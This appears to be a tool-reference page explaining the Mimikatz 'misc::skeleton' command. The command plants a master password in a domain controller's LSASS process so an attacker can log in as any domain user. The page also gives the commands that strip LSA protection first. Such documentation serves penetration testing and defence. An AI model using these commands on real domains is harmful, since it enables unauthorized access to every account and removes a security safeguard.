misc::skeleton injects a "Skeleton Key" into the LSASS process on the domain controller. A "master password" can then be used to authenticate as any domain user, while domain users can authenticate with their own password. The default skeleton key password is mimikatz.
The command has the following argument:
  • /letaes
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
mimikatz # misc::skeleton
If the LSA protection is enabled, then the following commands can be used to remove it.
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
More information on the Skeleton Key attack on The Hacker Recipes.
Last modified 2yr ago